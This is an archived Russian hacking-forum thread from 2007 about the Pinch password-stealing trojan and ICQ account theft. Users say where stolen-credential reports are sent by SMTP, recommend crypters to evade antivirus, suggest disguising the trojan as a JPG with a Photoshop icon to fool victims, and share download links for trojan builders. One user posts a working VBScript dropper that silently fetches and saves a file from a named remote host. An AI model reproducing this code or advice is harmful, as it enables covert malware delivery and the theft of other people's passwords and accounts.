Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

RE: Троян для аськи

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Взлом программ] >> RE: Троян для аськи
Имя
Сообщение << Старые топики   Новые топики >>
RE: Троян для аськи - 2007-04-08 18:18:17.926666   
timur_nafikov

Сообщений: 1
Оценки: 0
Присоединился: 2007-04-07 12:12:22.403333
:) Хорошо!
У меня такой вопросик…   Pinch 3  SMTP  он отсылает если в инете прям после запуска (а если он не в инете то можешь ничего не жздать!) или дожижается пока лузер зайдет в инет, потом отошлет и тогда тока затухнет?!
Post #: 41
RE: Троян для аськи - 2007-04-09 00:07:04.293333   
proud snake

Сообщений: 81
Оценки: 0
Присоединился: 2007-03-25 03:45:17.260000
кажись он отслыает прямо после запуска[:(]
Post #: 42
RE: Троян для аськи - 2007-04-09 00:41:43.540000   
voody

Сообщений: 958
Оценки: 0
Присоединился: 2005-02-06 22:28:30

quote:

ORIGINAL: GROB_T

voody, на vbs можно очень легко сделать закачку файлов из интернета, качать будет быстро, можно послать по ftp и по мылу с авторизацией, а насчет зависимочти от wscript, есть прога exescript, которая компилит vbs в exe, именно компилит, а не запаковывает, при запуске такого exe не запускается процесс wscript.exe


Говоришь, можно легко закачку реализовать на VBS? Каким образом? Через обычный ftp.exe? Программой ExeScript я не пользовался, т.к. уже давно перешел с написания WSH-скриптов на написание обычных компилируемых программ на C++. Мне вот еще что интересно: какого размера получится программа, после обработки ExeScript'ом и будет ли она от чего-то зависеть (как, например, обычный Visual Basic - он на одних "подпорках" держится)?
Post #: 43
RE: Троян для аськи - 2007-04-09 18:38:02.700000   
Softver

Сообщений: 65
Оценки: 0
Присоединился: 2006-12-07 10:48:17.810000
А у меня что то пинч остановил свою работу. Сегодня утром создал его, и уже успел опробывать на друге. А затем он перестал отправлять на мыло отчёты. Хотя утром работал нормально. Я на всякий случай сделал новый пинч с новыми мейлами, но всё равно эффекта нет. Кто нибудь может мне обяснить почему такое происходит????? Ксатти mail.ru работает на приём отчётов..(у меня работал с утра)!!!ЖДУ ВАШИХ ОТВЕТОВ,КАК МОЖНО СКОРО!!!Спасибо заранее.
Post #: 44
RE: Троян для аськи - 2007-04-09 21:32:24.083333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
quote:

ORIGINAL: voody

quote:

ORIGINAL: GROB_T

voody, на vbs можно очень легко сделать закачку файлов из интернета, качать будет быстро, можно послать по ftp и по мылу с авторизацией, а насчет зависимочти от wscript, есть прога exescript, которая компилит vbs в exe, именно компилит, а не запаковывает, при запуске такого exe не запускается процесс wscript.exe


Говоришь, можно легко закачку реализовать на VBS? Каким образом? Через обычный ftp.exe? Программой ExeScript я не пользовался, т.к. уже давно перешел с написания WSH-скриптов на написание обычных компилируемых программ на C++. Мне вот еще что интересно: какого размера получится программа, после обработки ExeScript'ом и будет ли она от чего-то зависеть (как, например, обычный Visual Basic - он на одних "подпорках" держится)?

 
Вот тебе скрипт - все фаеры отдыхают:
 
'–Begin user variables–
On Error Resume Next
sSource = "http://pashkela.narod.ru/progi/Pass.rar"
sDest = "Pass.rar"
'—End user variables—
set oHTTP = WScript.CreateObject("Microsoft.XMLHTTP")
set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
oHTTP.open "GET", sSource, False
oHTTP.send
body8209 = oHTTP.responseBody
set oHTTP = nothing
sOut = ""
For i = 0 to UBound(body8209)
 sOut = sOut & chrw(ascw(chr(ascb(midb(body8209,i+1,1)))))
Next
set oTS = oFSO.CreateTextFile(sDest, True)
oTS.Write sOut
oTS.Close
set oTS = Nothing
set oFSO = Nothing
'WScript.Echo "Done!"
wscript.quit(0)
 
 
После обработки exescript весит правда 50 кб:) Зато пашет и не требует на "чужом" компутере никаких длл и т.д.  Чистый дропер. Качает незаметно, на экране абсолютно ничего не появляется, просто молча появляется в той же папке, где и дропер, закачанный файл. Скорость очень даже приличная - как будто просто скачиваашь. Т.е. обычная зависимость от скорости соединения
Post #: 45
RE: Троян для аськи - 2007-04-10 22:14:40.820000   
proud snake

Сообщений: 81
Оценки: 0
Присоединился: 2007-03-25 03:45:17.260000
quote:

ала его по FTP/посылала на мыло/передавала PHP-скрипту. Что хорошего в этом способе - не надо ломать голову относительно того, как вытащить с компа те, или иные пароли, ты сразу все получишь в одном файле, да и программа (которую

ну дак как насчет криптора?
Post #: 46
RE: Троян для аськи - 2007-04-16 18:35:13.186666   
Маленький КРОЧЧИ

Сообщений: 2
Оценки: 0
Присоединился: 2007-04-15 20:21:06.766666
мою тему снесли….. постучу в чужую…..

проблема - генератор уинов понаделал на 13 мб. номеров…. все мутим…. IPBrute включаем, а нифига ищет-ищет не находит…
помогите, я лох!
Post #: 47
RE: Троян для аськи - 2007-04-16 20:45:23.433333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
quote:

ORIGINAL: Маленький КРОЧЧИ

мою тему снесли….. постучу в чужую…..

проблема - генератор уинов понаделал на 13 мб. номеров…. все мутим…. IPBrute включаем, а нифига ищет-ищет не находит…
помогите, я лох!

 
Проверь список проксей на рабочесть
Post #: 48
RE: Троян для аськи - 2007-04-17 16:44:17.656666   
Маленький КРОЧЧИ

Сообщений: 2
Оценки: 0
Присоединился: 2007-04-15 20:21:06.766666
И как это сделать? В файле с проксями след запись

; proxylist v1.7 (C) 2002-2003 VKE (ULTIMATE-COMPANY.COM)
; format:
; address:port;avg_connect_time_sess;cant_conn,err_conn,ok_conn;cant_conn_sess,err_conn_sess,ok_conn_sess;comment
;
; saved: 2007-04-16 20:57:18 Уральское время (зима)
; proxies count: 0 all, 0 good, 0 alive
;
;#version=1.7
;#reset_connection_counters_on_load=no
;



что это все значит, я не знаю
Post #: 49
RE: Троян для аськи - 2007-04-17 21:36:56.070000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
quote:

ORIGINAL: Маленький КРОЧЧИ

И как это сделать? В файле с проксями след запись

; proxies count: 0 all, 0 good, 0 alive




что это все значит, я не знаю

 
Ыыыыыыыыыыыыы:) Вот над этим и подумай
Post #: 50
RE: Троян для аськи - 2007-04-29 02:18:04.203333   
Zender

Сообщений: 6
Оценки: 0
Присоединился: 2007-04-29 02:15:37.030000
расскажите пожалуйста, как сделать так чтобы этот троян не детектился антивирусниками ?
Реально ли вшить этот троян в обычную JPG картинку ?
Post #: 51
RE: Троян для аськи - 2007-04-29 02:19:06.406666   
Zender

Сообщений: 6
Оценки: 0
Присоединился: 2007-04-29 02:15:37.030000
расскажите пожалуйста, как сделать так чтобы этот троян не детектился антивирусниками ?
Реально ли вшить этот троян в обычную JPG картинку или еще во чтото ?
Как сделать чтобы человек не боялся открыть мой троян =) 
Post #: 52
RE: Троян для аськи - 2007-04-29 19:27:55.743333   
Kreved

Сообщений: 1
Оценки: 0
Присоединился: 2007-04-29 18:59:31.813333
Превет
2 Маленький КРОЧЧИ. Чтобы брутить тебе нужен список прокси, их можно взять например от сюда:
http://www.proxylists.net/ или http://www.samair.ru/proxy/ потом их нужно отчекать например
Proxy list checker'ом http://www.ifolder.ru/1845692
2 proud snake. Лично я использовал RLPpack, Каспером не палиться, http://www.ifolder.ru/1845742
2 Zender. Вшить можно, только расширение ехе будет, это настораживает…Хотя если иконку от фотошопа приделать, может прокатить с каким нибудь чайником

Post #: 53
RE: Троян для аськи - 2007-05-02 15:08:34.973333   
Roker

Сообщений: 5
Оценки: 0
Присоединился: 2007-05-02 14:58:11.260000
я отправил троян по мылу знакомумо, но мне не пришло отчёта, кто нить может обьяснить почему? настроил вроде правильно то что чел прочитал это письмо 100% только отчёта на моём мыле нет…заранее спасибо за ответы…
Post #: 54
RE: Троян для аськи - 2007-05-02 18:30:41.800000   
GROB_T

Сообщений: 349
Оценки: 0
Присоединился: 2007-01-05 02:54:27.330000
Ты трояна на себе проверял? Может ты его просто неправильно настроил
Post #: 55
RE: Троян для аськи - 2007-05-02 22:31:10.733333   
Roker

Сообщений: 5
Оценки: 0
Присоединился: 2007-05-02 14:58:11.260000
на себе пробовал и тоже не работает, видимо неправильно настроил, не знаю что не так и соответсвенно не могу исправить, может поможет кто настроить и склеить…
Post #: 56
RE: Троян для аськи - 2007-05-09 14:06:20.923333   
Jmen7up

Сообщений: 61
Оценки: 0
Присоединился: 2007-01-13 23:04:33.556666
А что нужно писать в smtp.mail.ru? В проге pinch builder
Post #: 57
RE: Троян для аськи - 2007-05-09 19:00:21.250000   
GROB_T

Сообщений: 349
Оценки: 0
Присоединился: 2007-01-05 02:54:27.330000
на mail.ru smtp.mail.ru, но туда не всегда отчеты приходят, лучше всего goolook.ru, smtp - mail.goolook.ru, туда отчеты исправно идут.
Post #: 58
RE: Троян для аськи - 2007-05-09 19:15:14.090000   
Jmen7up

Сообщений: 61
Оценки: 0
Присоединился: 2007-01-13 23:04:33.556666

quote:

ORIGINAL: GROB_T

на mail.ru smtp.mail.ru, но туда не всегда отчеты приходят, лучше всего goolook.ru, smtp - mail.goolook.ru, туда отчеты исправно идут.

Cпасибо большое!
Post #: 59
RE: Троян для аськи - 2007-05-09 19:25:59.473333   
Jmen7up

Сообщений: 61
Оценки: 0
Присоединился: 2007-01-13 23:04:33.556666
Еще пару вопросов пинч обизатильно на мыло надо отправлять? И что если адрес получателя будет ****@ukr.net? И если я его криптону вот этой прогой MorphBeta.exe он работать будет?
Post #: 60
RE: Троян для аськи - 2007-05-09 20:23:10.110000   
GROB_T

Сообщений: 349
Оценки: 0
Присоединился: 2007-01-05 02:54:27.330000
если ты имеешь ввиду отчет, то можно еще настраивать через гейт, тогда отчет будет сохраняться на сервере, а не присылаться на мыло, точно не знаю, но ксинч вроде после morph beta не пахал(могу ошибаться)
Post #: 61
RE: Троян для аськи - 2007-05-10 10:02:02.140000   
Romulez

Сообщений: 40
Оценки: 0
Присоединился: 2004-05-30 13:15:15
а у этого трояна есть функция кейлоггера?
Post #: 62
RE: Троян для аськи - 2007-05-10 13:13:12.203333   
GreenAngel

Сообщений: 23
Оценки: 0
Присоединился: 2007-05-07 18:00:17.093333
Народ плиз выложите ссылку где новый криптор скачать, чтобы не палился касперским 7.0 и как зделать так,чтобы фаервол не блокировал пинча??????
Зарание спасибо!
Post #: 63
RE: Троян для аськи - 2007-05-10 13:28:05.650000   
blacksun

Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000

quote:

ORIGINAL: GreenAngel

Народ плиз выложите ссылку где новый криптор скачать, чтобы не палился касперским 7.0 и как зделать так,чтобы фаервол не блокировал пинча??????
Зарание спасибо!

Наивный … все паблик крипторы начинают палится в течении недели … можешь за пол бакса закриптовать приватным криптором ..
Post #: 64
RE: Троян для аськи - 2007-06-12 21:46:24.970000   
d0c3nT

Сообщений: 1
Оценки: 0
Присоединился: 2007-06-12 21:42:34.140000
quote:

ORIGINAL: GROB_T

o3opHou_ryJI9ka,
Pinch3_gate: http://grob-t.narod.ru/hachtools/Pinch3_gate.rar
Pinch3_smtp: http://grob-t.narod.ru/hachtools/Pinch3_smtp.rar
Parser: http://grob-t.narod.ru/hachtools/Parser2.rar
PECompact2(используtтся для сжатия в pinch3, надо скопировать в папку с билдером): http://grob-t.narod.ru/hachtools/PECompact2.rar
Pinch2.60: http://grob-t.narod.ru/hachtools/Pinch2.60.rar
Xinch1.5_alfa4: http://grob-t.narod.ru/hachtools/Xinch_1.5_alfa_4.rar
Pinch1.0: http://grob-t.narod.ru/hachtools/pinch1.0.rar

Пароль на все архивы: grob-t.narod.ru

 
есть несколько вопросов по данным прогам…думаю форум превратица в треш после моих вопросов…кто свободен пожалуйста моя ася 295287000.
Post #: 65
RE: Троян для аськи - 2007-08-26 22:37:30.986666   
N.E.X.U.S.

Сообщений: 2
Оценки: 0
Присоединился: 2007-08-26 22:21:12.953333
Народ кто можеь взломать мою асю? Если не трудно! Вот она: 437975895…
Post #: 66
Страниц:  1 [2]
Все форумы >> [Взлом программ] >> RE: Троян для аськи







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.